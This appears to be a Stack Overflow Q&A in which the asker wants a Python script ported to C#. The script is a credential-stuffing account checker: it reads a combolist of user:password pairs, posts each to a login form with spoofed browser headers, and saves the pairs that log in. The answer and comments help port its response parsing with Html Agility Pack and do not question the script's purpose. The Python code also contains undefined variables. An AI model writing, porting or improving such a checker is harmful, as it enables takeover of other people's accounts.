# Python Translation to .NET C#

Tags: python, beautifulsoup

I want help translating finding the equivalent code for the C# version.

Mainly, I don't understand the BeautifulSoup and html.parser the most.
 Which libraries would I use in C# I ask for demonstration  of  code example. Thanks for all the help.

````
import urllib.parse
import time
from bs4 import BeautifulSoup

def check_acc(user,password):
    POST = 'POST'
    GET = 'GET'
    data = "userLoginId={}&password={}&STAYIN=false&flow=websiteSignUp&mode=login&action=loginAction&withFields=STAYIN%2CnextPage%2CuserLoginId%2Cpassword%2CcountryCode%2CcountryIsoCode&authURL=authURL%2FEcpWPKhtag%3D&nextPage=&showPassword=&countryCode=%2B33&countryIsoCode=USA".format(email, password).encode("utf-8")

    request_login = urllib.request.Request("https://www.mywebsitetest:8080/Admin",
    data = data,
    headers ={
    'Host': 'www.mywebsitetest.com',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'fr-FR',
    'Accept-Encoding': 'gzip, deflate, br',
    'Referer': 'https://www.mywebsitetest/USA/Login',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': 330},
    unverifiable = True,
    method = 'POST')

    resfused_msg = "Wrong combination</a>.".format('<a href="/">')
    try:
        response = urllib.request.urlopen(request_login)
        readed = response.read()
        soup = BeautifulSoup(readed, "html.parser")
        IsTrue = str(soup.findAll("div", attrs={"class" : "ui-message-contents"}).text)
        if IsTrue == resfused_msg:
            print("Refused => ({}:{})".format(user, password))
        else:
            print("Accepted => ({}:{})".format(user, password))
            result_file = open(result, "a")
            result_file.write(user + ":" + password)
    except Exception as e:
        print(f"[-] Sorry an error as occured.\n=> {e}\n")
        print("[+]Closing program.\n")
        time.sleep(2)
        exit()

combo = "working.txt"
try:
    combo_file = open(combo, "r")
    line = list(combo)
    print("[+]Combolist loaded.\n")
    for line in combo_file:
        user = line.split(":")[0]
        password = line.split(":")[1]
        check_acc(user,password)
except FileNotFoundError:
    print("[-]NOthing found.")

print("[+]Bye!...\n")
time.sleep(20)
exit()```
````

Answer (score 0, accepted):

The [Html Agility Pack](https://html-agility-pack.net/) is one of the most common HTML parsing packages used in C#. It is available via direct download or from the NuGet package feed. The documentation is [available here](https://html-agility-pack.net/parser). You should also get the [CssSelectors](https://www.nuget.org/packages/HtmlAgilityPack.CssSelectors/) nuget package to allow you to use CSS Selectors to extract elements from the DOM.

To get your div with the `ui-message-contents` class you will do something like:

```
// You will need to pass in/configure the headers and other fields for your request before you call GetResponse
HttpWebRequest request= (HttpWebRequest)WebRequest.Create(url);
HttpWebResponse response = (HttpWebResponse)request.GetResponse();

HtmlDocument document = new HtmlAgilityPack.HtmlDocument();

document.Load(response.GetResponseStream());
IList<HtmlNode> elements = document.QuerySelectorAll("div.ui-message-contents");

// or if you're only expecting a single result
HtmlNode element = document.QuerySelector("div.ui-message-contents");
```

Comment: Thanks, I will try this out.

Comment: here is where I got https://ghostbin.com/paste/znefs I get this error  'HtmlDocument' does not contain a definition for 'QuerySelector' and no accessible extension method 'QuerySelector' accepting a first argument of type 'HtmlDocument' could be found (are you missing a using directive or an assembly reference?) All the code is is the main function. @MattStannett

Comment: Change `IList<HtmlNode> elements = document.QuerySelector("class" , "ui-message-contents");` to this `HtmlNode element = document.QuerySelector(".ui-message-contents");`. Since you only expect a single element to have that class you use `QuerySelector` (returns  single `HtmlNode`, rather than `QuerySelectorAll` (returns a collection (`IList<HtmlNode>`)). The exact error you were getting was because you were passing in two parameters to the `QuerySelector` call. That call only takes a single parameter - a string which represents the cssSelector ".ui-message-contents" in this case.

Comment: See [here](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Selectors) and [here](https://guide.freecodecamp.org/css/tutorials/css-selectors-cheat-sheet/) for more information on CSS selectors.

Comment: Thanks, I did ```document.DocumentNode.QuerySelector(".ui-message-contents");``` works too :)